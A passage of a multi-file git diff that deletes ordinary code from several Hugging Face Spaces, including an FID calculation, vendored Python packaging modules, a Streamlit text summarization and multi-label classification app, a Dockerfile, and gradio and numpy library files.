calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=eps, - return_components=return_components) - -def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6, - return_components=False): - """Numpy implementation of the Frechet Distance. - The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1) - and X_2 ~ N(mu_2, C_2) is - d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)). - - Stable version by Dougal J. Sutherland. - - Params: - -- mu1 : Numpy array containing the activations of a layer of the - inception net (like returned by the function 'get_predictions') - for generated samples. - -- mu2 : The sample mean over activations, precalculated on an - representative data set. - -- sigma1: The covariance matrix over activations for generated samples. - -- sigma2: The covariance matrix over activations, precalculated on an - representative data set. - - Returns: - -- : The Frechet Distance. 
- """ - - mu1 = np.atleast_1d(mu1) - mu2 = np.atleast_1d(mu2) - - sigma1 = np.atleast_2d(sigma1) - sigma2 = np.atleast_2d(sigma2) - - assert mu1.shape == mu2.shape, \ - 'Training and test mean vectors have different lengths' - assert sigma1.shape == sigma2.shape, \ - 'Training and test covariances have different dimensions' - - diff = mu1 - mu2 - - # Product might be almost singular - covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False) - if not np.isfinite(covmean).all(): - msg = ('fid calculation produces singular product; ' - 'adding %s to diagonal of cov estimates') % eps - print(msg) - offset = np.eye(sigma1.shape[0]) * eps - covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset)) - - # Numerical error might give slight imaginary component - if np.iscomplexobj(covmean): - if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3): - m = np.max(np.abs(covmean.imag)) - raise ValueError('Imaginary component {}'.format(m)) - covmean = covmean.real - - tr_covmean = np.trace(covmean) - - meandiff = diff.dot(diff) - covdiff = np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean - if return_components: - return (meandiff + covdiff, meandiff, covdiff) - else: - return meandiff + covdiff - - -def calculate_activation_statistics(act): - """Calculation of the statistics used by the FID. - Params: - -- files : List of image files paths - -- model : Instance of inception model - -- batch_size : The images numpy array is split into batches with - batch size batch_size. A reasonable batch size - depends on the hardware. - -- dims : Dimensionality of features returned by Inception - -- cuda : If set to True, use GPU - -- verbose : If set to True and parameter out_step is given, the - number of calculated batches is reported. - Returns: - -- mu : The mean over samples of the activations of the pool_3 layer of - the inception model. - -- sigma : The covariance matrix of the activations of the pool_3 layer of - the inception model. - """ - mu = np.mean(act, axis=0) - sigma = np.cov(act, rowvar=False) - return mu, sigma diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py deleted file mode 100644 index b1ea8105dad6e27eefd5a34f64dfee974a5c4f71..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py +++ /dev/null @@ -1,120 +0,0 @@ -import functools -import os -import pathlib -import types -import warnings - -from typing import Union, Iterable, ContextManager, BinaryIO, TextIO, Any - -from . import _common - -Package = Union[types.ModuleType, str] -Resource = str - - -def deprecated(func): - @functools.wraps(func) - def wrapper(*args, **kwargs): - warnings.warn( - f"{func.__name__} is deprecated. Use files() instead. " - "Refer to https://importlib-resources.readthedocs.io" - "/en/latest/using.html#migrating-from-legacy for migration advice.", - DeprecationWarning, - stacklevel=2, - ) - return func(*args, **kwargs) - - return wrapper - - -def normalize_path(path: Any) -> str: - """Normalize a path by ensuring it is a string. - - If the resulting string contains path separators, an exception is raised. 
- """ - str_path = str(path) - parent, file_name = os.path.split(str_path) - if parent: - raise ValueError(f'{path!r} must be only a file name') - return file_name - - -@deprecated -def open_binary(package: Package, resource: Resource) -> BinaryIO: - """Return a file-like object opened for binary reading of the resource.""" - return (_common.files(package) / normalize_path(resource)).open('rb') - - -@deprecated -def read_binary(package: Package, resource: Resource) -> bytes: - """Return the binary contents of the resource.""" - return (_common.files(package) / normalize_path(resource)).read_bytes() - - -@deprecated -def open_text( - package: Package, - resource: Resource, - encoding: str = 'utf-8', - errors: str = 'strict', -) -> TextIO: - """Return a file-like object opened for text reading of the resource.""" - return (_common.files(package) / normalize_path(resource)).open( - 'r', encoding=encoding, errors=errors - ) - - -@deprecated -def read_text( - package: Package, - resource: Resource, - encoding: str = 'utf-8', - errors: str = 'strict', -) -> str: - """Return the decoded string of the resource. - - The decoding-related arguments have the same semantics as those of - bytes.decode(). - """ - with open_text(package, resource, encoding, errors) as fp: - return fp.read() - - -@deprecated -def contents(package: Package) -> Iterable[str]: - """Return an iterable of entries in `package`. - - Note that not all entries are resources. Specifically, directories are - not considered resources. Use `is_resource()` on each entry returned here - to check if it is a resource or not. - """ - return [path.name for path in _common.files(package).iterdir()] - - -@deprecated -def is_resource(package: Package, name: str) -> bool: - """True if `name` is a resource inside `package`. - - Directories are *not* resources. - """ - resource = normalize_path(name) - return any( - traversable.name == resource and traversable.is_file() - for traversable in _common.files(package).iterdir() - ) - - -@deprecated -def path( - package: Package, - resource: Resource, -) -> ContextManager[pathlib.Path]: - """A context manager providing a file path object to the resource. - - If the resource does not already exist on its own on the file system, - a temporary file will be created. If the file was created, the file - will be deleted upon exiting the context manager (no exception is - raised if the file was deleted prior to the context manager - exiting). - """ - return _common.as_file(_common.files(package) / normalize_path(resource)) diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py deleted file mode 100644 index d6c0c007aad871b9348fea57c9188d0ffd5f10d2..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py +++ /dev/null @@ -1,175 +0,0 @@ -"""Module for parsing and testing package version predicate strings. -""" -import re -from . import version -import operator - - -re_validPackage = re.compile(r"(?i)^\s*([a-z_]\w*(?:\.[a-z_]\w*)*)(.*)", re.ASCII) -# (package) (rest) - -re_paren = re.compile(r"^\s*\((.*)\)\s*$") # (list) inside of parentheses -re_splitComparison = re.compile(r"^\s*(<=|>=|<|>|!=|==)\s*([^\s,]+)\s*$") -# (comp) (version) - - -def splitUp(pred): - """Parse a single version comparison. 
- - Return (comparison string, StrictVersion) - """ - res = re_splitComparison.match(pred) - if not res: - raise ValueError("bad package restriction syntax: %r" % pred) - comp, verStr = res.groups() - with version.suppress_known_deprecation(): - other = version.StrictVersion(verStr) - return (comp, other) - - -compmap = { - "<": operator.lt, - "<=": operator.le, - "==": operator.eq, - ">": operator.gt, - ">=": operator.ge, - "!=": operator.ne, -} - - -class VersionPredicate: - """Parse and test package version predicates. - - >>> v = VersionPredicate('pyepat.abc (>1.0, <3333.3a1, !=1555.1b3)') - - The `name` attribute provides the full dotted name that is given:: - - >>> v.name - 'pyepat.abc' - - The str() of a `VersionPredicate` provides a normalized - human-readable version of the expression:: - - >>> print(v) - pyepat.abc (> 1.0, < 3333.3a1, != 1555.1b3) - - The `satisfied_by()` method can be used to determine with a given - version number is included in the set described by the version - restrictions:: - - >>> v.satisfied_by('1.1') - True - >>> v.satisfied_by('1.4') - True - >>> v.satisfied_by('1.0') - False - >>> v.satisfied_by('4444.4') - False - >>> v.satisfied_by('1555.1b3') - False - - `VersionPredicate` is flexible in accepting extra whitespace:: - - >>> v = VersionPredicate(' pat( == 0.1 ) ') - >>> v.name - 'pat' - >>> v.satisfied_by('0.1') - True - >>> v.satisfied_by('0.2') - False - - If any version numbers passed in do not conform to the - restrictions of `StrictVersion`, a `ValueError` is raised:: - - >>> v = VersionPredicate('p1.p2.p3.p4(>=1.0, <=1.3a1, !=1.2zb3)') - Traceback (most recent call last): - ... - ValueError: invalid version number '1.2zb3' - - It the module or package name given does not conform to what's - allowed as a legal module or package name, `ValueError` is - raised:: - - >>> v = VersionPredicate('foo-bar') - Traceback (most recent call last): - ... - ValueError: expected parenthesized list: '-bar' - - >>> v = VersionPredicate('foo bar (12.21)') - Traceback (most recent call last): - ... - ValueError: expected parenthesized list: 'bar (12.21)' - - """ - - def __init__(self, versionPredicateStr): - """Parse a version predicate string.""" - # Fields: - # name: package name - # pred: list of (comparison string, StrictVersion) - - versionPredicateStr = versionPredicateStr.strip() - if not versionPredicateStr: - raise ValueError("empty package restriction") - match = re_validPackage.match(versionPredicateStr) - if not match: - raise ValueError("bad package name in %r" % versionPredicateStr) - self.name, paren = match.groups() - paren = paren.strip() - if paren: - match = re_paren.match(paren) - if not match: - raise ValueError("expected parenthesized list: %r" % paren) - str = match.groups()[0] - self.pred = [splitUp(aPred) for aPred in str.split(",")] - if not self.pred: - raise ValueError("empty parenthesized list in %r" % versionPredicateStr) - else: - self.pred = [] - - def __str__(self): - if self.pred: - seq = [cond + " " + str(ver) for cond, ver in self.pred] - return self.name + " (" + ", ".join(seq) + ")" - else: - return self.name - - def satisfied_by(self, version): - """True if version is compatible with all the predicates in self. - The parameter version must be acceptable to the StrictVersion - constructor. It may be either a string or StrictVersion. 
- """ - for cond, ver in self.pred: - if not compmap[cond](version, ver): - return False - return True - - -_provision_rx = None - - -def split_provision(value): - """Return the name and optional version number of a provision. - - The version number, if given, will be returned as a `StrictVersion` - instance, otherwise it will be `None`. - - >>> split_provision('mypkg') - ('mypkg', None) - >>> split_provision(' mypkg( 1.2 ) ') - ('mypkg', StrictVersion ('1.2')) - """ - global _provision_rx - if _provision_rx is None: - _provision_rx = re.compile( - r"([a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*)(?:\s*\(\s*([^)\s]+)\s*\))?$", re.ASCII - ) - value = value.strip() - m = _provision_rx.match(value) - if not m: - raise ValueError("illegal provides specification: %r" % value) - ver = m.group(2) or None - if ver: - with version.suppress_known_deprecation(): - ver = version.StrictVersion(ver) - return m.group(1), ver diff --git a/spaces/pleonova/multi-label-summary-text/app.py b/spaces/pleonova/multi-label-summary-text/app.py deleted file mode 100644 index 82974db498d8be941a790a66a8b50406a91b5e5d..0000000000000000000000000000000000000000 --- a/spaces/pleonova/multi-label-summary-text/app.py +++ /dev/null @@ -1,366 +0,0 @@ - -from os import write -import time -import pandas as pd -import base64 -from typing import Sequence -import streamlit as st -from sklearn.metrics import classification_report - - -# from models import create_nest_sentences, load_summary_model, summarizer_gen, load_model, classifier_zero -import models as md -from utils import examples_load, example_long_text_load -import json - -ex_text, ex_license, ex_labels, ex_glabels = examples_load() -ex_long_text = example_long_text_load() - - -# if __name__ == '__main__': -################################### -######## App Description ########## -################################### -st.markdown("### Long Text Summarization & Multi-Label Classification") -st.write("This app summarizes and then classifies your long text(s) with multiple labels using [BART Large CNN](https://huggingface.co/facebook/bart-large-cnn) for the summarization task and [BART Large MNLI](https://huggingface.co/facebook/bart-large-mnli) for the multi-labels matching. The keywords are independently generated using [KeyBERT](https://github.com/MaartenGr/KeyBERT) and not used in any downstream tasks.") -st.write("__Inputs__: User enters their own custom text(s) and labels.") -st.write("__Outputs__: A summary of the text, likelihood match score for each label and a downloadable csv of the results. \ - Includes additional options to generate a list of keywords and/or evaluate results against a list of ground truth labels, if available.") - - - -################################### -######## Example Input ########## -################################### -example_button = st.button(label='See Example') -if example_button: - example_text = ex_long_text #ex_text - display_text = 'Excerpt from Frankenstein:' + example_text + '"\n\n' + "[This is an excerpt from Project Gutenberg's Frankenstein. 
" + ex_license + "]" - input_labels = ex_labels - input_glabels = ex_glabels - title_name = 'Frankenstein, Chapter 3' -else: - display_text = '' - input_labels = '' - input_glabels = '' - title_name = 'Submitted Text' - - - -with st.form(key='my_form'): - ################################### - ######## Form: Step 1 ########## - ################################### - st.markdown("##### Step 1: Upload Text") - text_input = st.text_area("Input any text you want to summarize & classify here (keep in mind very long text will take a while to process):", display_text) - - text_csv_expander = st.expander(label=f'Want to upload multiple texts at once? Expand to upload your text files below.', expanded=False) - with text_csv_expander: - st.markdown('##### Choose one of the options below:') - st.write("__Option A:__") - uploaded_text_files = st.file_uploader(label="Upload file(s) that end with the .txt suffix", - accept_multiple_files=True, key = 'text_uploader', - type='txt') - st.write("__Option B:__") - uploaded_csv_text_files = st.file_uploader(label='Upload a CSV file with two columns: "title" and "text"', - accept_multiple_files=False, key = 'csv_text_uploader', - type='csv') - - if text_input == display_text and display_text != '': - text_input = example_text - - gen_keywords = st.radio( - "Generate keywords from text? (independent from the input labels below)", - ('Yes', 'No') - ) - - gen_summary = st.radio( - "Generate summary from text? (recommended for label matching below, but will take longer)", - ('Yes', 'No') - ) - - ################################### - ######## Form: Step 2 ########## - ################################### - st.write('\n') - st.markdown("##### Step 2: Enter Labels") - labels = st.text_input('Enter possible topic labels, which can be either keywords and/or general themes (comma-separated):',input_labels, max_chars=2000) - labels = list(set([x.strip() for x in labels.strip().split(',') if len(x.strip()) > 0])) - - labels_csv_expander = st.expander(label=f'Prefer to upload a list of labels instead? Click here to upload your CSV file.',expanded=False) - with labels_csv_expander: - uploaded_labels_file = st.file_uploader("Choose a CSV file with one column and no header, where each cell is a separate label", - key='labels_uploader') - - ################################### - ######## Form: Step 3 ########## - ################################### - st.write('\n') - st.markdown("##### Step 3: Provide Ground Truth Labels (_Optional_)") - glabels = st.text_input('If available, enter ground truth topic labels to evaluate results, otherwise leave blank (comma-separated):',input_glabels, max_chars=2000) - glabels = list(set([x.strip() for x in glabels.strip().split(',') if len(x.strip()) > 0])) - - - glabels_csv_expander = st.expander(label=f'Have a file with labels for the text? 
Click here to upload your CSV file.', expanded=False)
-    with glabels_csv_expander:
-        st.markdown('##### Choose one of the options below:')
-        st.write("__Option A:__")
-        uploaded_onetext_glabels_file = st.file_uploader("Single Text: Choose a CSV file with one column and no header, where each cell is a separate label",
-            key = 'onetext_glabels_uploader')
-        st.write("__Option B:__")
-        uploaded_multitext_glabels_file = st.file_uploader('Multiple Text: Choose a CSV file with two columns "title" and "label", with the cells in the title column matching the name of the files uploaded in step #1.',
-            key = 'multitext_glabels_uploader')
-
-
-    # threshold_value = st.slider(
-    #     'Select a threshold cutoff for matching percentage (used for ground truth label evaluation)',
-    #     0.0, 1.0, (0.5))
-
-    submit_button = st.form_submit_button(label='Submit')
-
-st.write("_For improvements/suggestions, please file an issue here: https://github.com/pleonova/multi-label-summary-text_")
-
-
-###################################
-####### Model Load Time #########
-###################################
-with st.spinner('Loading pretrained models...'):
-    start = time.time()
-    summarizer = md.load_summary_model()
-    s_time = round(time.time() - start,4)
-
-    start = time.time()
-    classifier = md.load_model()
-    c_time = round(time.time() - start,4)
-
-    start = time.time()
-    kw_model = md.load_keyword_model()
-    k_time = round(time.time() - start,4)
-
-    st.spinner(f'Time taken to load various models: {k_time}s for KeyBERT model & {s_time}s for BART summarizer model & {c_time}s for BART classifier mnli model.')
-    # st.success(None)
-
-
-if submit_button or example_button:
-    ###################################
-    ######## Load Text Data #######
-    ###################################
-    if len(text_input) == 0 and len(uploaded_text_files) == 0 and uploaded_csv_text_files is None:
-        st.error("Enter some text to generate a summary")
-    else:
-
-        if len(text_input) != 0:
-            text_df = pd.DataFrame.from_dict({'title': [title_name], 'text': [text_input]})
-
-        # OPTION A
-        elif len(uploaded_text_files) != 0:
-            st.markdown("### Text Inputs")
-            st.write('Files concatenated into a dataframe:')
-            file_names = []
-            raw_texts = []
-            for uploaded_file in uploaded_text_files:
-                text = str(uploaded_file.read(), "utf-8")
-                raw_texts.append(text)
-                title_file_name = uploaded_file.name.replace('.txt','')
-                file_names.append(title_file_name)
-            text_df = pd.DataFrame({'title': file_names,
-                                    'text': raw_texts})
-            st.dataframe(text_df.head())
-            st.download_button(
-                label="Download data as CSV",
-                data=text_df.to_csv().encode('utf-8'),
-                file_name='title_text.csv',
-                mime='title_text/csv',
-            )
-        # OPTION B
-        elif uploaded_csv_text_files is not None:
-            text_df = pd.read_csv(uploaded_csv_text_files)
-
-        # Which input was used? 
If text area was used, ignore the 'title' - if len(text_input) != 0: - title_element = [] - else: - title_element = ['title'] - - - ################################### - ######## Text Chunks ########## - ################################### - with st.spinner('Breaking up text into more reasonable chunks (transformers cannot exceed a 1024 token max)...'): - # For each body of text, create text chunks of a certain token size required for the transformer - - text_chunks_lib = dict() - for i in range(0, len(text_df)): - nested_sentences = md.create_nest_sentences(document=text_df['text'][i], token_max_length=1024) - - # For each chunk of sentences (within the token max) - text_chunks = [] - for n in range(0, len(nested_sentences)): - tc = " ".join(map(str, nested_sentences[n])) - text_chunks.append(tc) - title_entry = text_df['title'][i] - text_chunks_lib[title_entry] = text_chunks - - - ################################ - ######## Keywords ########## - ################################ - if gen_keywords == 'Yes': - st.markdown("### Top Keywords") - with st.spinner("Generating keywords from text..."): - - kw_dict = dict() - text_chunk_counter = 0 - for key in text_chunks_lib: - keywords_list = [] - for text_chunk in text_chunks_lib[key]: - text_chunk_counter += 1 - keywords_list += md.keyword_gen(kw_model, text_chunk) - kw_dict[key] = dict(keywords_list) - # Display as a dataframe - kw_df0 = pd.DataFrame.from_dict(kw_dict).reset_index() - kw_df0.rename(columns={'index': 'keyword'}, inplace=True) - kw_df = pd.melt(kw_df0, id_vars=['keyword'], var_name='title', value_name='score').dropna() - - kw_column_list = ['keyword', 'score'] - kw_df = kw_df[kw_df['score'] > 0.25][title_element + kw_column_list].sort_values(title_element + ['score'], ascending=False).reset_index().drop(columns='index') - - st.dataframe(kw_df) - st.download_button( - label="Download data as CSV", - data=kw_df.to_csv().encode('utf-8'), - file_name='title_keywords.csv', - mime='title_keywords/csv', - ) - - - ################################### - ########## Summarize ########## - ################################### - if gen_summary == 'Yes': - st.markdown("### Summary") - with st.spinner(f'Generating summaries for {len(text_df)} texts consisting of a total of {text_chunk_counter} chunks (this may take a minute)...'): - sum_dict = dict() - for i, key in enumerate(text_chunks_lib): - with st.expander(label=f'({i+1}/{len(text_df)}) Expand to see intermediate summary generation details for: {key}', expanded=False): - # for key in text_chunks_lib: - summary = [] - for num_chunk, text_chunk in enumerate(text_chunks_lib[key]): - chunk_summary = md.summarizer_gen(summarizer, sequence=text_chunk, maximum_tokens=400, minimum_tokens=100) - summary.append(chunk_summary) - - st.markdown(f"###### Original Text Chunk {num_chunk+1}/{len(text_chunks)}" ) - st.markdown(text_chunk) - st.markdown(f"###### Partial Summary {num_chunk+1}/{len(text_chunks)}") - st.markdown(chunk_summary) - - # Combine all the summaries into a list and compress into one document, again - final_summary = "\n\n".join(list(summary)) - sum_dict[key] = [final_summary] - - sum_df = pd.DataFrame.from_dict(sum_dict).T.reset_index() - sum_df.columns = ['title', 'summary_text'] - # TO DO: Make sure summary_text does not exceed the token length - - st.dataframe(sum_df) - st.download_button( - label="Download data as CSV", - data=sum_df.to_csv().encode('utf-8'), - file_name='title_summary.csv', - mime='title_summary/csv', - ) - - ################################### - ########## 
Classifier ######### - ################################### - if ((len(text_input) == 0 and uploaded_text_files is None and uploaded_csv_text_files is None) - or (len(labels) == 0 and uploaded_labels_file is None)): - st.error('Enter some text and at least one possible topic to see label predictions.') - else: - if gen_summary == 'Yes': - st.markdown("### Top Label Predictions on Summary vs Full Text") - else: - st.markdown("### Top Label Predictions on Full Text") - - if uploaded_labels_file is not None: - labels_df = pd.read_csv(uploaded_labels_file, header=None) - label_list = labels_df.iloc[:, 0] - else: - label_list = labels - - with st.spinner('Matching labels...(may take some time)'): - if gen_summary == 'Yes': - labels_sum_col_list = ['title', 'label', 'scores_from_summary'] - labels_sum_df = pd.DataFrame(columns=labels_sum_col_list) - - labels_full_col_list = ['title', 'label', 'scores_from_full_text'] - labels_full_df = pd.DataFrame(columns=labels_full_col_list) - - for i in range(0, len(text_df)): - if gen_summary == 'Yes': - s_topics, s_scores = md.classifier_zero(classifier, sequence=sum_df['summary_text'][i], labels=label_list, multi_class=True) - ls_df = pd.DataFrame({'label': s_topics, 'scores_from_summary': s_scores}) - ls_df['title'] = text_df['title'][i] - labels_sum_df = pd.concat([labels_sum_df, ls_df[labels_sum_col_list]]) - - f_topics, f_scores = md.classifier_zero(classifier, sequence=text_df['text'][i], labels=label_list, multi_class=True) - lf_df = pd.DataFrame({'label': f_topics, 'scores_from_full_text': f_scores}) - lf_df['title'] = text_df['title'][i] - labels_full_df = pd.concat([labels_full_df, lf_df[labels_full_col_list]]) - - with st.expander(f'({i+1}/{len(text_df)}) See intermediate label matching results for: {text_df["title"][i]}'): - if gen_summary == 'Yes': - st.dataframe(pd.merge(ls_df, lf_df, on=['title','label'])) - else: - st.dataframe(lf_df) - - if gen_summary == 'Yes': - label_match_df = pd.merge(labels_sum_df, labels_full_df, on=['title', 'label']) - else: - label_match_df = labels_full_df.copy() - - ################################### - ####### Ground Truth Labels ###### - ################################### - if len(glabels) > 0: - gdata = pd.DataFrame({'label': glabels}) - join_list = ['label'] - elif uploaded_onetext_glabels_file is not None: - gdata = pd.read_csv(uploaded_onetext_glabels_file, header=None) - join_list = ['label'] - gdata.columns = join_list - elif uploaded_multitext_glabels_file is not None: - gdata = pd.read_csv(uploaded_multitext_glabels_file) - join_list = ['title', 'label'] - gdata.columns = join_list - - if len(glabels) > 0 or uploaded_onetext_glabels_file is not None or uploaded_multitext_glabels_file is not None: - gdata['correct_match'] = True - label_match_df = pd.merge(label_match_df, gdata, how='left', on=join_list) - label_match_df['correct_match'].fillna(False, inplace=True) - - st.dataframe(label_match_df) #.sort_values(['title', 'label'], ascending=[False, False])) - st.download_button( - label="Download data as CSV", - data=label_match_df.to_csv().encode('utf-8'), - file_name='title_label_sum_full.csv', - mime='title_label_sum_full/csv', - ) - - # if len(glabels) > 0: - # st.markdown("### Evaluation Metrics") - # with st.spinner('Evaluating output against ground truth...'): - # - # section_header_description = ['Summary Label Performance', 'Original Full Text Label Performance'] - # data_headers = ['scores_from_summary', 'scores_from_full_text'] - # for i in range(0,2): - # st.markdown(f"###### 
{section_header_description[i]}") - # report = classification_report(y_true = data2[['is_true_label']], - # y_pred = (data2[[data_headers[i]]] >= threshold_value) * 1.0, - # output_dict=True) - # df_report = pd.DataFrame(report).transpose() - # st.markdown(f"Threshold set for: {threshold_value}") - # st.dataframe(df_report) - - st.success('All done!') - st.balloons() diff --git a/spaces/pompuritz/keroppurin/Dockerfile b/spaces/pompuritz/keroppurin/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/pompuritz/keroppurin/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py deleted file mode 100644 index 8ce89cef706adc0d08fc4de5625a495e4003798e..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -from .core import contents, where - -__all__ = ["contents", "where"] -__version__ = "2023.07.22" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js deleted file mode 100644 index 37eb47ed880979a3b61e304e08edabafaf9b4f3c..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js +++ /dev/null @@ -1,2 +0,0 @@ -const{SvelteComponent:c,append:u,attr:d,detach:g,element:o,init:v,insert:r,noop:f,safe_not_equal:y,set_data:m,text:b,toggle_class:i}=window.__gradio__svelte__internal;function h(a){let e,n;return{c(){e=o("div"),n=b(a[0]),d(e,"class","svelte-1ayixqk"),i(e,"table",a[1]==="table"),i(e,"gallery",a[1]==="gallery"),i(e,"selected",a[2])},m(t,l){r(t,e,l),u(e,n)},p(t,[l]){l&1&&m(n,t[0]),l&2&&i(e,"table",t[1]==="table"),l&2&&i(e,"gallery",t[1]==="gallery"),l&4&&i(e,"selected",t[2])},i:f,o:f,d(t){t&&g(e)}}}function q(a,e,n){let{value:t}=e,{type:l}=e,{selected:_=!1}=e;return a.$$set=s=>{"value"in s&&n(0,t=s.value),"type"in s&&n(1,l=s.type),"selected"in s&&n(2,_=s.selected)},[t,l,_]}class w extends c{constructor(e){super(),v(this,e,q,h,y,{value:0,type:1,selected:2})}}export{w as default}; -//# sourceMappingURL=Example-d55a7a8d.js.map diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css deleted file mode 100644 index a990b695131e200f077ed1748fcfb0587be148af..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css +++ /dev/null @@ -1 +0,0 @@ -div.svelte-19hvt5v{display:flex;position:relative;border:1px solid 
var(--border-color-primary);border-top:none;border-bottom-right-radius:var(--container-radius);border-bottom-left-radius:var(--container-radius);padding:var(--block-padding)} diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py deleted file mode 100644 index 536062e3827921df637105680ea9e8ea879b8f3e..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py +++ /dev/null @@ -1,7 +0,0 @@ -""" -Tests for the array API namespace. - -Note, full compliance with the array API can be tested with the official array API test -suite https://github.com/data-apis/array-api-tests. This test suite primarily -focuses on those things that are not tested by the official test suite. -""" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py deleted file mode 100644 index 9730574cf22e22823aaa0c77be9e630425cb2f79..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py +++ /dev/null @@ -1,1206 +0,0 @@ -""" -Abstract base class for the various polynomial Classes. - -The ABCPolyBase class provides the methods needed to implement the common API -for the various polynomial classes. It operates as a mixin, but uses the -abc module from the stdlib, hence it is only available for Python >= 2.6. - -""" -import os -import abc -import numbers - -import numpy as np -from . import polyutils as pu - -__all__ = ['ABCPolyBase'] - -class ABCPolyBase(abc.ABC): - """An abstract base class for immutable series classes. - - ABCPolyBase provides the standard Python numerical methods - '+', '-', '*', '//', '%', 'divmod', '**', and '()' along with the - methods listed below. - - .. versionadded:: 1.9.0 - - Parameters - ---------- - coef : array_like - Series coefficients in order of increasing degree, i.e., - ``(1, 2, 3)`` gives ``1*P_0(x) + 2*P_1(x) + 3*P_2(x)``, where - ``P_i`` is the basis polynomials of degree ``i``. - domain : (2,) array_like, optional - Domain to use. The interval ``[domain[0], domain[1]]`` is mapped - to the interval ``[window[0], window[1]]`` by shifting and scaling. - The default value is the derived class domain. - window : (2,) array_like, optional - Window, see domain for its use. The default value is the - derived class window. - symbol : str, optional - Symbol used to represent the independent variable in string - representations of the polynomial expression, e.g. for printing. - The symbol must be a valid Python identifier. Default value is 'x'. - - .. versionadded:: 1.24 - - Attributes - ---------- - coef : (N,) ndarray - Series coefficients in order of increasing degree. - domain : (2,) ndarray - Domain that is mapped to window. - window : (2,) ndarray - Window that domain is mapped to. - symbol : str - Symbol representing the independent variable. - - Class Attributes - ---------------- - maxpower : int - Maximum power allowed, i.e., the largest number ``n`` such that - ``p(x)**n`` is allowed. This is to limit runaway polynomial size. - domain : (2,) ndarray - Default domain of the class. - window : (2,) ndarray - Default window of the class. 
- - """ - - # Not hashable - __hash__ = None - - # Opt out of numpy ufuncs and Python ops with ndarray subclasses. - __array_ufunc__ = None - - # Limit runaway size. T_n^m has degree n*m - maxpower = 100 - - # Unicode character mappings for improved __str__ - _superscript_mapping = str.maketrans({ - "0": "⁰", - "1": "¹", - "2": "²", - "3": "³", - "4": "⁴", - "5": "⁵", - "6": "⁶", - "7": "⁷", - "8": "⁸", - "9": "⁹" - }) - _subscript_mapping = str.maketrans({ - "0": "₀", - "1": "₁", - "2": "₂", - "3": "₃", - "4": "₄", - "5": "₅", - "6": "₆", - "7": "₇", - "8": "₈", - "9": "₉" - }) - # Some fonts don't support full unicode character ranges necessary for - # the full set of superscripts and subscripts, including common/default - # fonts in Windows shells/terminals. Therefore, default to ascii-only - # printing on windows. - _use_unicode = not os.name == 'nt' - - @property - def symbol(self): - return self._symbol - - @property - @abc.abstractmethod - def domain(self): - pass - - @property - @abc.abstractmethod - def window(self): - pass - - @property - @abc.abstractmethod - def basis_name(self): - pass - - @staticmethod - @abc.abstractmethod - def _add(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _sub(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _mul(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _div(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _pow(c, pow, maxpower=None): - pass - - @staticmethod - @abc.abstractmethod - def _val(x, c): - pass - - @staticmethod - 